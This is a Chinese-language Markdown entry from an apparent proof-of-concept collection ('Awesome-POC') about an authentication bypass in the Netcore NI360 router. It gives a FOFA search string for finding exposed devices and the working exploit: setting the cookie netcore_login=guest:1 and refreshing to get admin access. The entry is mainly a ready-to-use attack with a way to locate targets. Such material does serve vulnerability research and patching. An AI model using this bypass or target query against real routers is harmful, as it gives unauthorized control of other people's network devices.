Awesome-POC/网络设备漏洞/磊科 NI360路由器 认证绕过漏洞.md
Threekiii e9e1a4597a init
2022-02-20 17:08:56 +08:00

29 lines
512 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 磊科 NI360路由器 认证绕过漏洞
## 漏洞描述
磊科 NI360路由器 存在认证绕过漏洞通过添加特定的Cookie字段获取后台权限
## 漏洞影响
```
磊科 NI360路由器
```
## FOFA
```
title="Netcore"
```
## 漏洞描述
登录页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949810.png)
添加 Cookie字段 : **netcore_login=guest:1**
刷新后登录后台
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949667.png)